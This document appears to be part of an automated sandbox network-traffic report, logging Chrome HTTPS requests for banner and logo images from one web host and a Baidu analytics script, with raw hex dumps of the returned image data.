                                                      2025-01-12 23:48:00 UTC4096INData Raw: 79 ba 54 a6 5c 47 6c f9 23 97 e8 8e 24 6a 1d a5 07 46 e1 13 22 88 f5 61 f4 59 4a 52 25 ae c2 3d a8 6d b7 b3 d9 22 75 b7 63 9e 03 f7 be ed 20 fe aa 0c b1 19 b6 7d 53 1f b1 1a 89 dc 42 05 32 aa 24 f9 6d 19 9d e9 8d 5a 7c a2 ee 37 f9 30 1c 00 03 90 af cd 6f d8 39 25 f5 f1 52 d3 74 f9 75 7d 49 31 22 f9 8c 11 52 85 31 62 dd da 2a 50 0e 29 df 6b c3 aa 04 bb 67 c1 7e 4d dc 59 32 ee 46 ae b1 20 f0 61 d2 5b 12 78 40 98 28 7f 77 11 11 26 8e f0 e5 c4 ca fb 79 62 bd e8 e6 bc 53 ea b4 ba b1 3f 3a cc 92 8d de 08 c8 04 f6 10 22 51 f8 a9 63 c3 05 cb f6 b1 3f d3 1d 26 f1 f6 48 a2 91 62 45 49 4d 3f a7 2a ec 49 f4 aa 99 a0 1f c9 5a 9a 9f f5 d8 d3 3a fa 91 51 fa 0d 44 c8 b9 fe b0 60 28 73 43 f9 aa 6d 2c 27 d2 4d 18 fe b4 19 c3 81 93 23 fa 53 fb 1f 03 d3 3f d1 f1 30 15 52 94
                                                      Data Ascii: yT\Gl#$jF"aYJR%=m"uc }SB2$mZ|70o9%Rtu}I1"R1b*P)kg~MY2F a[x@(w&ybS?:"Qc?&HbEIM?*IZ:QD`(sCm,'M#S?0R
                                                      2025-01-12 23:48:00 UTC4096INData Raw: 84 df 4c d5 b4 d8 14 e6 dc c5 75 72 63 3b 39 2b ac 7d 8e 1e 3c 1c 16 a9 b3 b4 fd 40 54 11 63 19 83 85 ac b8 b9 0f 23 c4 68 41 28 2a 55 0b da 7c c7 88 96 f3 72 1b b1 25 a9 34 12 12 02 4b 3c c8 f7 06 e5 f5 0f bd f7 af a4 5c aa 1e 89 f5 a5 35 9a fe 8a 03 a7 b5 04 88 71 24 26 65 3d 2e a2 99 a9 b2 07 7c a2 36 f6 ed 6c 3c 0a f2 c6 80 ab 36 85 57 9f aa f5 0c 5a 93 65 d5 23 bd cb 90 d5 b2 3c 28 82 a5 0f 05 6d 12 cc ef 5b 39 f9 2a 96 69 7f 4a 93 83 5e 54 5b 3f 4d 52 49 e5 29 72 a4 53 49 ea 69 54 27 cc 83 0e 34 18 f4 ef 96 dd b3 7b 99 86 2a 5a f7 41 c8 af e9 d7 d5 9b 51 7d 36 79 c1 d7 11 e6 46 ef 4e 6b 0e db a0 a6 e1 13 b2 f5 e2 78 6a 29 53 28 be 92 06 9f 23 53 03 e2 50 65 48 8e d8 eb 77 ad 08 60 e4 a5 ac f0 58 b9 1e de 35 05 12 b3 3b 53 d5 b4 13 a9 48 9f 52 38 55
                                                      Data Ascii: Lurc;9+}<@Tc#hA(*U|r%4K<\5q$&e=.|6l<6WZe#<(m[9*iJ^T[?MRI)rSIiT'4{*ZAQ}6yFNkxj)S(#SPeHw`X5;SHR8U


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      117192.168.2.44986220.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:59 UTC386OUTGET /images_plus/other/banner6.jpg?ver=1606891697 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:59 UTC357INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:59 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 54542
                                                      Connection: close
                                                      Last-Modified: Wed, 02 Dec 2020 06:48:17 GMT
                                                      ETag: "5fc738b1-d50e"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:59 UTC3739INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c2 00 11 08 00 ff 02 bc 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 00 01 03 05 01 01 00 00 00 00 00 00 00 00 00 00 00 03 06 07 02 04 05 08 09 0a 01 ff c4 00 1c 01 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 02 05 06 07 01 08 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f3 fe
                                                      Data Ascii: JFIFCC
                                                      2025-01-12 23:47:59 UTC4096INData Raw: 4a 4a 59 fc b5 ba 99 a5 f6 20 a8 a8 00 0a 85 0a 81 1a 87 ab da 3b 2b c8 36 3a 07 1c 9c 86 db 69 1a d9 d7 7d 19 52 fe 19 9f 3c af 5d 1e f5 9c 74 a9 26 8c cf 8f 61 e1 da 61 db 5a 05 89 6b 49 b2 73 72 bb 8d 3b ef f9 99 d2 d7 2b 93 f9 ad 86 f0 ee 19 b5 a7 98 f4 7b 4e 92 d9 b1 d6 e9 e0 76 cb 5c 32 5f 30 e2 bf 39 77 98 91 e5 8e 9e 3d 87 e8 75 bd 7b e4 b6 dc 63 b5 16 92 75 fa 8b 79 23 0a 4a 4a 0f 80 26 00 00 00 02 a2 88 ee 24 86 e5 1d cb 1b c9 2b 64 33 82 69 b7 c5 c5 74 fa 97 9d 8d 1f cc be e3 e3 9f 3d 3e b5 ab 06 e1 e9 3e 96 22 a9 d8 59 c7 3d b3 3b 68 ec 59 b3 b6 8e 74 59 89 00 01 40 00 2a 2a 3e 8b 23 0a d1 bb cf 63 94 37 d8 4c 32 79 c9 0f 3f df 3c ca 5e d7 4e 26 6f 5f b5 d9 fe 0f d5 1f 92 57 d7 2e ab 80 8c 77 dc d2 2c e8 16 01 da 34 c4 06 a8 f1 13 31 a7 50 fc
                                                      Data Ascii: JJY ;+6:i}R<]t&aaZkIsr;+{Nv\2_09w=u{cuy#JJ&$+d3it=>>"Y=;hYtY@**>#c7L2y?<^N&o_W.w,41P
                                                      2025-01-12 23:47:59 UTC4096INData Raw: 92 ed 68 f9 02 d7 50 4d 08 27 db 91 ce 55 a4 c9 4b 70 dd 17 20 b1 ae 9a 3c 75 fc ae 5d 4e 26 3c b1 43 94 4d 24 eb 8e a8 b0 f9 e6 b9 58 aa d1 84 58 14 fd aa 9a 67 cc 81 43 ad b7 f1 75 88 c9 21 7d 76 7b 4e 47 6c 27 08 71 44 64 37 29 58 09 95 14 c8 33 7a 99 17 cd cd b5 db 33 14 76 6a d6 94 25 31 23 b7 95 a0 aa 1b 29 72 45 51 9a 71 72 03 ec e4 ba 87 21 c7 aa e7 9c 36 89 6d 8c d4 a2 9a 9e cc 0e 47 7d bc 5c ba 0a fb a4 ca 92 0e 86 19 96 49 98 e4 65 33 6b 25 93 4a a2 bc cd 32 8c 2f a6 5c 66 4c d7 ca 2e b9 f9 a5 46 b0 1b 36 34 5e 89 58 4d b7 cb a7 31 46 59 1c 61 bd 5f 5b 42 aa 80 41 6d 04 6f 3c a8 1c d9 83 5f 18 6e 3c 42 eb 4d 5b 59 8d d3 6e 39 69 1c b2 bb ed d9 20 3e 5f 0f 03 52 0b d5 e0 a2 aa bf a2 67 4a 01 ff 00 6e 2b 49 36 d7 a8 82 f0 ae 38 e2 e5 ad c7 4e 4d
                                                      Data Ascii: hPM'UKp <u]N&<CM$XXgCu!}v{NGl'qDd7)X3z3vj%1#)rEQqr!6mG}\Ie3k%J2/\fL.F64^XM1FYa_[BAmo<_n<BM[Yn9i >_RgJn+I68NM
                                                      2025-01-12 23:48:00 UTC4096INData Raw: 78 b1 93 f5 aa 69 a0 f5 3c 2e 34 b2 67 d6 33 b9 d4 f5 e0 f0 22 ea 3f 24 46 93 6b 84 a0 fb 4b cd 26 9c 5d 6c 97 42 71 0a e4 9b 8d 71 43 37 af 1c 86 fb 78 bf 06 64 0c 8c 70 9a 58 52 43 96 34 79 8e 6b cd a2 ad 30 e7 c5 89 1a 68 66 10 36 37 1e 2f fe d7 5e f7 3b 70 2d 96 eb 51 1b 8c 09 1a 42 83 f4 c3 82 a9 89 a3 23 65 8e 3c ac 81 d0 6d c5 64 32 5b 8c d1 c1 06 33 67 1a 9a 25 23 ac 03 07 5c 0a c0 66 d1 35 be d2 8d 9a d8 6a 9d 9f a2 74 5a 29 6d 4b 8d 10 da 6e a3 29 c1 67 dc db c6 df 5b 3a f2 9c 8a 08 29 0c ab 8d 0d 59 fe de 3e f7 ec 30 38 84 41 e0 a7 c6 20 9b 98 6d 2e aa b5 57 89 39 d0 cd 6c 9c 9b 52 10 06 5a 29 24 33 c0 2c 12 46 9d 57 04 a9 9a 71 74 c0 55 eb 2c bb 77 7a d0 bb 64 a8 a9 42 24 5f 6b b7 1a e4 ad e3 4e fb cf bd 22 d4 2f bc 13 8f 44 51 d8 17 15 a6 be
                                                      Data Ascii: xi<.4g3"?$FkK&]lBqqC7xdpXRC4yk0hf67/^;p-QB#e<md2[3g%#\f5jtZ)mKn)g[:)Y>08A m.W9lRZ)$3,FWqtU,wzdB$_kN"/DQ
                                                      2025-01-12 23:48:00 UTC4096INData Raw: a9 3e 9a 15 be 33 7d b5 d1 13 50 6d 72 56 72 4b c6 20 c2 54 26 50 bc 89 0d bc 57 e2 d7 04 ba 50 20 e8 47 29 6b 0f 95 14 00 15 13 dd 8d b1 8e f5 ed 7e 1e f0 41 f5 70 79 78 d2 3f 49 b9 13 53 d9 6d 40 af ca 3c 9a d1 dd c1 47 76 8f a5 8c 6e 44 85 8c db aa 4e 6f 0b a0 b8 19 ee f4 5c e3 d7 71 ce 90 d6 dc f1 0c 8c a3 1a 3a a8 54 0c 51 72 2b a1 3c ff 00 0c 47 5a 93 b4 dd 93 74 88 92 da 00 fb 3e 58 b1 cd 3e ae 53 f9 d0 ee 25 15 ca d4 ac e1 81 4b e6 09 a1 85 e1 2c 96 70 df 9b f0 68 22 4c b9 0f 85 9f 8f 0e 7d 38 e4 06 44 75 5c 82 f2 7b 85 c2 83 71 8c ab 05 2c fc 89 62 e1 8b 38 56 9d ea 0f 99 8d d0 5d cf 32 0e a5 41 75 37 23 3e 3e 47 f6 0b 35 3b 79 66 95 c5 82 ae 0c dd 09 4a 46 53 4f e9 3b d2 67 01 b4 94 99 6e ba 8c 9d 1c c5 1a 8d d8 05 99 ea a1 02 94 91 eb 5a 4b 51
                                                      Data Ascii: >3}PmrVrK T&PWP G)k~Apyx?ISm@<GvnDNo\q:TQr+<GZt>X>S%K,ph"L}8Du\{q,b8V]2Au7#>>G5;yfJFSO;gnZKQ
                                                      2025-01-12 23:48:00 UTC4096INData Raw: df 63 be a3 b7 42 d3 1d e3 a8 25 cd ca 0f 79 89 dd 15 de 4d b9 b4 4a 49 79 07 b5 d7 c3 8e 1c 6d 7e 1e ba bf 52 df 13 f7 b1 bb 5e 37 6b ea 0f ed fa a0 83 e2 ed fd dc 07 46 de 02 0f b8 10 5e fc 51 80 83 f7 fe c6 02 0f 01 07 d7 b5 f8 71 c1 96 34 5e 4e 4a 68 e8 d7 04 35 d2 c0 d9 00 e2 1a 79 a0 eb 04 50 78 e8 57 b6 b8 3d f8 25 7f 29 1a 05 b8 a7 3d 32 e1 37 b9 3d a2 0d b2 3c 17 dd a1 bb d1 05 0b 39 06 35 47 08 e5 77 0d 15 af 43 72 39 94 53 e9 75 91 ca 35 a5 9c ef 51 a5 25 d0 39 84 ea ac fb 48 97 a4 f8 89 43 c6 d0 6f d9 8a 69 72 77 57 bf 78 81 8c e1 b4 b9 cd 92 e4 05 0e 1d 2e a0 55 38 ef 34 4f 6c 25 c7 61 b2 a6 33 28 40 10 b0 49 fe a2 17 96 7c 98 63 51 6c b7 d9 11 c5 51 3b 1d d2 8c ca 22 71 eb 35 cb d7 19 77 2d c4 82 0f 14 74 44 a6 e9 67 c3 6e 2a 30 69 2d 08 70
                                                      Data Ascii: cB%yMJIym~R^7kF^Qq4^NJh5yPxW=%)=27=<95GwCr9Su5Q%9HCoirwWx.U84Ol%a3(@I|cQlQ;"q5w-tDgn*0i-p
                                                      2025-01-12 23:48:00 UTC4096INData Raw: 6f 5e 38 57 82 aa 1c 4b 2f be 5f e3 aa 20 f6 b1 4b b4 73 f1 33 bb 6e 38 3d 74 10 3a ac be 13 7c d3 7b 6a 54 e1 95 6e 9c 72 cc 82 c2 2b 70 73 41 4e a3 47 e0 8a 85 38 90 82 5b 88 a4 eb 48 d8 76 90 80 d9 cd e2 fa 98 5e 7f 85 7d 45 01 52 7a 6d bd 68 cd 83 a8 63 db d9 97 6e 43 8a 2a e4 50 26 57 28 8a 8c 54 e9 74 d0 f0 d3 39 2c 59 e7 e2 b5 63 d3 78 1f cb 5f 87 b2 e7 3a 46 f3 61 97 35 d7 63 ac f1 c7 1d de 45 0a 0c 8a b2 06 b3 5d 8e c2 b5 65 16 2f a4 80 4c ac b4 dc 21 78 36 f5 6b 62 a7 09 c3 3e 9d 3a 88 b1 f8 49 44 3b a3 32 a8 91 39 68 12 b4 05 8a 1f 8b fa 98 a7 fc ac 29 96 10 b0 33 e5 6a 9a 3d a0 f5 e7 fb c6 05 d9 f8 14 fc bb 76 8a d3 96 7f 8a e6 67 e8 cb 0b 0b 4a 36 97 c5 90 59 fe 3d a5 e9 3e 60 e6 fb 38 28 dd e3 b8 03 94 ad 41 16 ee b4 58 5e 2d 9a 97 1f a8 bd
                                                      Data Ascii: o^8WK/_ Ks3n8=t:|{jTnr+psANG8[Hv^}ERzmhcnC*P&W(Tt9,Ycx_:Fa5cE]e/L!x6kb>:ID;29h)3j=vgJ6Y=>`8(AX^-
                                                      2025-01-12 23:48:00 UTC4096INData Raw: db 1b 12 9d 1d 5a 14 b4 10 ef b5 86 3a d3 06 e1 d9 a8 bc 57 ab 52 aa 03 09 6f 23 04 64 d6 9b 32 58 93 08 8c ad ba dd c5 99 7e 01 d9 e5 96 9c 55 f8 6b ed 3b 72 26 30 bb 01 63 db 9f e3 2c f1 df 5d 17 38 74 1a f8 4d 30 25 15 a4 45 67 a0 46 ed a3 e6 fb d5 72 31 78 e2 5a d2 a4 4a e3 ce 1c d2 54 a8 67 b4 7c 48 a2 20 0d 0f 35 a5 7f d7 e4 c3 68 37 87 13 f0 ac fe e3 51 82 19 fc 9b 66 47 2e c2 1b 7f 3e bc 36 ac da 7d 33 89 10 9f 09 ef 58 01 92 bd 1d 42 2c 5d df ce 7e 03 50 71 1e ad a1 0e 23 38 ae 34 32 38 fa 0a 2b b4 dd b8 b7 11 ee c2 a3 c7 14 56 be 1b 40 81 80 32 e5 fc 60 b6 7a 4b 12 eb ed 0a 90 a3 88 23 4f b0 45 59 e9 fc 8f 27 31 e2 5e 54 95 6c f5 a6 18 e1 14 d9 0d 2f 6d a0 3f fe 9e 3b ed 23 fe ea 95 89 35 20 54 fa 93 21 eb f7 45 11 da 4d d3 bb 2b ad e7 b3 0e 84
                                                      Data Ascii: Z:WRo#d2X~Uk;r&0c,]8tM0%EgFr1xZJTg|H 5h7QfG.>6}3XB,]~Pq#8428+V@2`zK#OEY'1^Tl/m?;#5 T!EM+
                                                      2025-01-12 23:48:00 UTC4096INData Raw: bb 6f 64 23 3d df 58 49 77 e2 9b c7 33 a9 30 c5 f6 17 c4 a6 40 5c a6 2a e1 1d d6 48 49 96 5f ce e0 f6 88 06 3f 85 e9 21 fc 0e ae 10 d0 34 b9 6d b4 d6 42 77 5e 36 e3 4b 4b 5a 7c b2 22 01 f2 8f 97 d9 c6 ad f8 0f 7b 56 ff 00 bf a8 c2 38 b3 c2 1c b2 0d 74 16 e2 53 2d e6 1d bc 98 d4 c0 7d f8 7d e1 7e 0a 74 2a ec 2a 77 94 e5 36 93 28 56 b2 fa dc a3 eb e0 30 0b f9 b6 e2 7e f4 cc d1 13 28 2f 1d cb 68 ff 00 21 73 7a 98 a4 4c 28 f3 63 67 d0 c1 f7 bf e0 71 d6 18 43 00 91 32 1b 8d 4d 5b 79 ae 12 5f 65 a5 83 5f 8b 9c b6 ea 09 af aa e2 61 79 7a 8b 0e 69 c8 70 68 dc f9 04 57 fc d9 76 10 5d e6 60 fb 07 80 56 93 a6 32 d6 ca 78 09 dd 69 33 da e4 e4 c7 13 c9 d2 a0 d6 26 5a 0a 9e 7a 5a cb f0 f5 2f 1b d6 3a ab 26 08 6a 86 f5 5e 3e f4 6d 9e 27 94 b9 6d c6 ff 00 1b a1 76 f3 7d
                                                      Data Ascii: od#=XIw30@\*HI_?!4mBw^6KKZ|"{V8tS-}}~t**w6(V0~(/h!szL(cgqC2M[y_e_ayziphWv]`V2xi3&ZzZ/:&j^>m'mv}
                                                      2025-01-12 23:48:00 UTC4096INData Raw: 4a f0 48 c8 6e 1d 80 d8 ee b0 2f c3 b8 70 22 71 df 1e 71 3c b5 45 a5 c4 94 f6 c8 61 3e 44 86 58 80 18 eb 5c 22 d7 d8 16 53 58 61 78 f8 d8 93 c6 d5 0a 27 13 c8 db 09 0f 94 a5 a9 c9 6d 2d 32 0b 29 35 28 85 15 89 98 c9 82 0a 00 0a 9c 30 35 07 39 ba 31 81 e9 b6 d3 b4 c2 d6 09 5b e6 12 b4 b0 1d 0b c7 9d 89 f1 4f d9 2e 4f 6b ec 60 f9 fc 62 22 65 be 62 2d d8 f2 2f 9f 1c 43 1b bc 50 64 ae a0 87 aa a6 8d 25 30 65 25 89 23 16 a0 85 c1 a6 d1 d8 7d 1e f8 36 fe ed d3 ef 72 18 2f a3 eb 79 31 ce 69 e6 57 fb d6 e3 85 75 d9 32 49 a6 f9 e7 4e a6 c1 0a 84 80 8e cf 9a f1 08 2e e4 bf 93 15 ea 93 66 cf 98 ff 00 95 7b 5a 57 11 16 29 ac d5 8d 26 3b 4c 7d 9f aa 5d 58 aa c1 4c 8d 19 0e 12 35 99 73 07 37 4f de 71 04 26 c2 e2 0a 15 4d 3a a8 97 1c f6 90 17 ec e3 8b 2a 3a 14 07 1b 49
                                                      Data Ascii: JHn/p"qq<Ea>DX\"SXax'm-2)5(0591[O.Ok`b"eb-/CPd%0e%#}6r/y1iWu2IN.f{ZW)&;L}]XL5s7Oq&M:*:I


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      118192.168.2.44986314.215.183.794434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:59 UTC416OUTGET /hm.js?947ea0365dd8ab01fc51bd9439b42930 HTTP/1.1
                                                      Host: hm.baidu.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: HMACCOUNT_BFESS=E4D1CF12C6FA10DD
                                                      2025-01-12 23:48:00 UTC194INHTTP/1.1 200 OK
                                                      Content-Length: 0
                                                      Date: Sun, 12 Jan 2025 23:47:59 GMT
                                                      Server: apache
                                                      Strict-Transport-Security: max-age=172800
                                                      Content-Type: text/plain; charset=utf-8
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      119192.168.2.44987120.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:00 UTC391OUTGET /images_plus/footer/footer-logo.png?ver=1606790107 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:01 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:00 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 690
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:07 GMT
                                                      ETag: "5fc5abdb-2b2"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:01 UTC690INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 50 00 00 00 13 08 03 00 00 00 30 03 7a 5d 00 00 00 54 50 4c 54 45 99 99 99 00 00 00 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 84 70 40 b9 00 00 00 1c 74 52 4e 53 e6 00 4a 3e 26 16 0b b9 62 b1 73 97 dd ca 6b 55 d1 d8 ab 1d 85 31 37 c3 a1 a6 7b 8d d2 fa a8 15 00 00 01 f1 49 44 41 54 38 cb 8d 93 db b2 a5 20 0c 44 09 10 44 41 50 b7 77 ff ff 3f 07 48 54 4e 9d 9a d9 d3 2f d8 5c 56 25 0d 8a a2 06 fe 29 03 ff af ef 40 1d 5a 9d 98 f2 dc a7 69 3a 4e 05 ac f5 3c da 76 3a e6 34 11 bb 5b 01 bf 00 3f 5d 93 96 75 c2 8a 5b 19
                                                      Data Ascii: PNGIHDRP0z]TPLTEp@tRNSJ>&bskU17{IDAT8 DDAPw?HTN/\V%)@Zi:N<v:4[?]u[


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      120192.168.2.44987220.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:00 UTC386OUTGET /images_plus/other/banner7.jpg?ver=1606891701 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:01 UTC357INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:01 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 38207
                                                      Connection: close
                                                      Last-Modified: Wed, 02 Dec 2020 06:48:21 GMT
                                                      ETag: "5fc738b5-953f"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:01 UTC3739INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c2 00 11 08 00 ff 02 bc 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 02 03 06 07 08 04 05 09 01 0a ff c4 00 1c 01 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 05 04 06 07 02 01 08 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fc ff
                                                      Data Ascii: JFIFCC
                                                      2025-01-12 23:48:01 UTC4096INData Raw: f8 7f 5f 79 fe 73 30 4d ff 00 1e c3 f6 fc de 00 bc f2 f5 fd ea b8 e4 de 6f 6b 9d e6 98 00 02 a1 5c 9a 3e 4c 90 73 e4 c5 e6 20 c9 19 1a ee 5a ce d2 f1 ce 2e cb 7e e5 50 5b 50 da 49 17 09 35 e9 3d 2d 69 3c 5a d8 f6 bc c4 7d 6c 79 3d e4 d8 78 97 0f 6c b4 a2 b7 e0 c7 95 c2 4f c3 c7 9b 8c c8 f8 92 20 15 01 b4 f6 bc cf 98 f3 aa 35 5d 3a 65 44 7f 0a a7 2a 08 7b bc 1a ae ab 3a c7 87 97 94 8e 31 52 48 ee c9 a9 37 ce f7 92 79 c5 ae 77 6d ae b5 e6 9c 07 bd 66 aa e9 00 1f 4f 80 40 1f 4a 60 bb 66 a5 de ab de 4f e7 16 b9 dd f6 f2 d7 99 59 b1 c9 ae 75 5d 32 24 48 94 d2 0a 60 89 10 53 2f 3c bd 7f 7b ae 79 2f 9b 1a df 7a 88 00 00 48 e5 15 5e 2b c9 8f ce 47 da 7c c8 e7 bc 76 5e eb 79 52 56 f3 66 c6 e6 f9 c3 9c b1 cc a7 1f be 37 dc 9e 37 9c be 0e 3d 8f 03 c6 6f 59 f7 df 5b
                                                      Data Ascii: _ys0Mok\>Ls Z.~P[PI5=-i<Z}ly=xlO 5]:eD*{:1RH7ywmfO@J`fOYu]2$H`S/<{y/zH^+G|v^yRVf77=oY[
                                                      2025-01-12 23:48:01 UTC4096INData Raw: 02 24 8c 1f 31 29 52 c1 6b 12 7f 02 5b 45 ca 3e b0 dc 63 68 7a 82 78 12 48 ad b2 62 49 21 f7 0f 33 7d 00 2a 16 d1 ab d1 a5 da a4 f0 e3 99 de dd 3d 34 e9 74 73 39 db bf a6 9d 2e 8e 67 3b 77 f4 d3 a5 d1 cc e7 6e fe 9a 74 ba 39 9c ed df d3 4e 97 47 33 9d bb fa 69 d2 e8 e6 73 b7 7f 4d 3a 5d 1c ce 76 ef e9 a7 4b a3 99 ce dd fd 34 e9 74 73 39 db bf a6 9d 2e 8e 67 8b 77 f4 d3 a5 d1 5b b2 50 7c 37 29 e9 fa 95 45 de 08 0f 94 54 d0 f5 a9 1f 76 b4 96 19 ab 23 23 2c 03 88 22 82 26 98 db 82 24 0e 2a 1d 94 89 00 f1 10 41 31 d3 24 b6 93 94 4d 63 b8 36 c0 d5 1d 63 91 20 b6 8a 8b 24 87 5c 81 64 df 6f 65 3b 89 ab d2 a5 d2 4d 27 87 1c ce 96 e7 e9 a3 4b 63 99 d2 dc fd 34 69 6c 73 3a 5b 9f a6 8d 2d 8e 67 4b 73 f4 d1 a5 b1 cc e9 6e 7e 9a 34 b6 39 9d 2d cf d3 46 96 c7 33 a5 b9
                                                      Data Ascii: $1)Rk[E>chzxHbI!3}*=4ts9.g;wnt9NG3isM:]vK4ts9.gw[P|7)ETv##,"&$*A1$Mc6c $\doe;M'Kc4ils:[-gKsn~49-F3
